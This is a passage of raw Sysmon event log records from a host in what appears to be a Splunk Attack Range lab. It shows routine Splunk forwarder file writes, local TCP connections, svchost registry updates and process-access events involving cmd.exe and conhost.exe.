Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CD27D23173A2F9C9B5989E1AEF488B4,SHA256=5312F6F39D478822A5C406BB9028DE02AC5AE46509D464EAFFCEE834C401DCAC,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009682Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:20.541{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53639-false10.0.1.12-8000- 23542300x80000000000000009681Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:21.439{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0C153B351CC5C307B6A7ED7F7CDFE736,SHA256=47ED888048DB28CD6D978F9B96FBFE762500357E5856883863052F2BA6974E9C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009683Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:22.501{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=763E34DC2C7FC6B51C74585AB320E041,SHA256=D37F4F866A59E8C149AE0B237919AF5198933F634D1E142C720A25632ED2DAE9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009684Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:23.516{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1B8D32B733C794D7D20363DADAA3E7E5,SHA256=400B581FC2D7344CD41CD154855C57216F95392AD36325BA305C2347A6B205B1,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009685Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:24.547{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D4EFFA93A92F3262E8863B9DC1BE371,SHA256=55C81B0EB0F0FDC780FA58D0BD708FC9BB9E0AE008B6BA860A336F332F5D6C55,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009686Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:25.656{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B008149496AAD6B8B3F11A44FE42698E,SHA256=6F582F1B189A425587E8DA2AE0F39B93DAAECBE69D4510BE6CCA0625915EE7C7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009687Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:26.686{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0DA38211032DB7A806D8DE94F496F977,SHA256=CCF3E22E7D43FD92C481FB9C012A0DEC8B84367377F1F5C2DD85950072BDCC9C,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009689Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:26.494{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53640-false10.0.1.12-8000- 23542300x80000000000000009688Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:27.717{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D14C2B5B5DB9FEAB4C3A969911EC1D9,SHA256=5E7940B9216E373939120E8CF30EBB8C195DA04C7ACF0CADF62D4952E5D820F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009690Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:28.733{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=31C72660B5D00B665B88900033689DDD,SHA256=D49747BB93BACD51D6588421BCB90933214F0D5B49E3990C8ABA8B5E9633EF2E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009693Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:29.748{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=58C3D50FDCC09A976A2B73B92371D5EA,SHA256=899A3BF8284D844BD8843FFF1263AE687FB3A864A806855294618F80F234C5BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009692Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:29.748{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=29BDB57A9B7A54AE4C07D04A54FB1B35,SHA256=F00088AD44F748056E30132EE906936A4F0DC0E88978BCF3A913A3D5C78037BD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009691Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:29.748{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E2F5E8461965B3BAA4B29A516CF9A9B4,SHA256=F50E6F55F9C619B8B7B5C031ED73C185A1D357CB91C8813909AF11FBB40B54F0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009694Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:30.763{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=86D3ED2C44633090D4DC3C92B262B557,SHA256=1714BF2849F79B309D38D911BB6F9E91EF56BE287EFC0AFE83B03C499C0DB57A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009695Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:31.778{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3D3EEF9510C4DD95EF4574B6EEF8F3A0,SHA256=FC32C129C61FFBB719501D2D198CE22F17833436D1421595E9695B91AC3F0E05,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009696Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:32.778{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7E478B5C715C7F6C454557C179192B96,SHA256=1DF97FEAD7F00F3823DDDD1F6FCA21E3D8DD1A72D95518F3207C754C36BAA064,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009704Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:33.793{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=08ED64A01AE95F95E250957217CE3C27,SHA256=0352A2399DA9FEA1B84CF3141949467183AF01C0B5821766C1BDB683205265A4,IMPHASH=00000000000000000000000000000000falsetrue 13241300x80000000000000009703Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:05:33.293{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueBinary Data 13241300x80000000000000009702Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:05:33.293{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\ValueSizeDWORD (0x00000008) 13241300x80000000000000009701Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:05:33.293{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\KeySizeDWORD (0x00000000) 13241300x80000000000000009700Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:05:33.293{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\TimestampQWORD (0x01d72626-0x26d6baea) 13241300x80000000000000009699Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:05:33.293{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NetworksBinary Data 13241300x80000000000000009698Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:05:33.293{266CAFBE-646C-6064-1300-00000000AE01}1228C:\Windows\System32\svchost.exeHKLM\System\CurrentControlSet\Services\NcbService\NCB\KapiNlmCache\7\NumNetworksDWORD (0x00000001) 13241300x80000000000000009697Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-SetValue2021-03-31 12:05:33.012{266CAFBE-646C-6064-1200-00000000AE01}1196C:\Windows\system32\svchost.exeHKLM\System\CurrentControlSet\Services\W32Time\Config\LastKnownGoodTimeQWORD (0x01d72626-0x26abd8b9) 23542300x80000000000000009708Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:34.793{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=89FC94CC27B57F668CE57AC5F5F542EC,SHA256=E66F966618C4FE9BFF90885D156CCB612BDC00986A8828961B5993708D4514F5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009707Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:34.590{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=C7473592ABE08110688B66C5673E6FE5,SHA256=7693F93F526BBA7A83C694299B80E718F80C9D594B6E7F2F9E333ACC1262F1CA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009706Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:34.590{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=10504BD7EABA3CD3DB7C24480501F02E,SHA256=3717E0FA171342C099209476060CACE0D1A124F4FE88E7ECA9902680651AADC2,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009705Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:32.447{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53641-false10.0.1.12-8000- 23542300x80000000000000009709Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:35.808{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B2FA612F6E97522248B728DBE521B1F0,SHA256=E86360DDA3639BC9900A26279424993ED0DCF17F948C272F2F90910346A7C271,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009710Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:36.808{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3495854E175D23DBCC6060CD57E492D5,SHA256=9A6EAE6B3DE033C81566E889917214A7016B94BDDE01123C0318C6F1C2C5623F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009711Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:37.823{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=39268CE1A543DC80AE37041825985138,SHA256=230D52017C30E057D68E2371C33BEEEAE063D113AEC19618F3F2B80EC9D5B5D7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009713Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:38.823{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDF115B7EBDE874122D63E911E91F1D4,SHA256=4E7718D822F83F5AA90D9DA1015EDC458D6F2608ADDB92AB19A6E402290A9672,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009712Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:37.603{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53642-false10.0.1.12-8000- 23542300x80000000000000009714Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:39.838{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D9B46EDBBA54541F21383D822EAE07A8,SHA256=9520A95D8F458E7E26624624A39CAF6AC1B8F416E7AA2E9850C7ADAE3F713D42,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009715Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:40.853{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=066F600E9A776E8DA9506F0FFD00EFFD,SHA256=BF9441D3ED040B69A9842EC581B61B54BEC1529208C7C9643E16DE91B66548EA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009716Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:41.868{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=59B28D72F4CF753DE6CC147C852B25BA,SHA256=8329DA1808446FCFDECAABCFED7A42AEF3DF48B8135D335BDFF4B456C920DCC4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009717Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:42.962{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E51560233504B8FD1030BC6584D00B6D,SHA256=0504D200096D4700A11EBEED459725F0A65E6F4F0151C4C55D3BF8806F7F2E5E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009718Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:43.992{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9CE0885A1405302FA0B0E82D97059C23,SHA256=821553314FA7B2056988A5737E5AF7DDE07070E5CD41B8F6B6D6EF12C21D2C12,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000009721Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:43.556{266CAFBE-64F5-6064-0301-00000000AE01}6500C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-892.attackrange.local53643-false10.0.1.12-8000- 11241100x80000000000000009720Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:44.461{266CAFBE-646C-6064-1100-00000000AE01}1200C:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.dat2021-03-31 12:01:44.767 23542300x80000000000000009719Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:44.461{266CAFBE-646C-6064-1100-00000000AE01}1200NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=7A578EFB7C9FA76B652910F1CDE5FFDD,SHA256=2F4257769B27ACCA4A94346D6CFC3394CDA9868C86EDC54A8C62D9757E1F8777,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009722Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:45.086{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AB72222CCF368D6F6B0C4E9143BB2231,SHA256=1C65D2E81CB1B58148E0CFF232C051AF3929C6158874D310E3CBCAAB0EE648CD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009723Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:46.101{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AE6530F90E0C7526F3C1369C232345A6,SHA256=D9C6214FBFA9C4C6866260DEA71931B0C7282ECC588B57FF856F132AAD53EB93,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009724Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:47.116{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0A0F41DF1A33EFB454D1EA680688FEE3,SHA256=BE65A499D9D010355BC411EFBBA7321AA79C86CB4953B357D52406E274F56F73,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000009752Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.866{266CAFBE-64ED-6064-D500-00000000AE01}5648NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=B35B78CAB02E2DF96E6298AED402CCE2,SHA256=ABF9EEBE445FCAD2912EDB5BD53AB1DE5E78CFB0B4162908801B10E8CC745B21,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000009751Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.475{266CAFBE-64C5-6064-A500-00000000AE01}43563344C:\Windows\Explorer.EXE{266CAFBE-659C-6064-4A01-00000000AE01}7148C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009750Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.475{266CAFBE-64C5-6064-A500-00000000AE01}43563344C:\Windows\Explorer.EXE{266CAFBE-659C-6064-4A01-00000000AE01}7148C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b96de|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009749Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.475{266CAFBE-64C5-6064-A500-00000000AE01}43563344C:\Windows\Explorer.EXE{266CAFBE-659C-6064-4A01-00000000AE01}7148C:\Windows\system32\cmd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7144|C:\Windows\System32\SHELL32.dll+b96a7|C:\Windows\Explorer.EXE+3c618|C:\Windows\Explorer.EXE+3c4a4|C:\Windows\Explorer.EXE+3c411|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009748Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.475{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-659C-6064-4B01-00000000AE01}1532C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009747Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.475{266CAFBE-64C4-6064-9E00-00000000AE01}31204072C:\Windows\system32\taskhostw.exe{266CAFBE-659C-6064-4B01-00000000AE01}1532C:\Windows\system32\conhost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\MSCTF.dll+af11|C:\Windows\System32\MSCTF.dll+b489|C:\Windows\System32\MSCTF.dll+be73|C:\Windows\System32\MSCTF.dll+3d832|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009746Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:05:48.444{266CAFBE-64C5-6064-A500-00000000AE01}43564392C:\Windows\Explorer.EXE{266CAFBE-659C-6064-4A01-00000000AE01}7148C:\Windows\system32\cmd.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\SHELL32.dll+b7a3f|C:\Windows\System32\SHELL32.dll+b97c5|C:\Windows\Explorer.EXE+1e03a|C:\Windows\Explorer.EXE+1e249|C:\Windows\Explorer.EXE+1df79|C:\Windows\Explorer.EXE+3c407|C:\Windows\System32\windows.storage.dll+13bc8f|C:\Windows\System32\windows.storage.dll+13aa1b|C:\Windows\System32\windows.storage.dll+138f3f|C:\Windows\System32\SHCORE.dll+367a6|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000009745Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 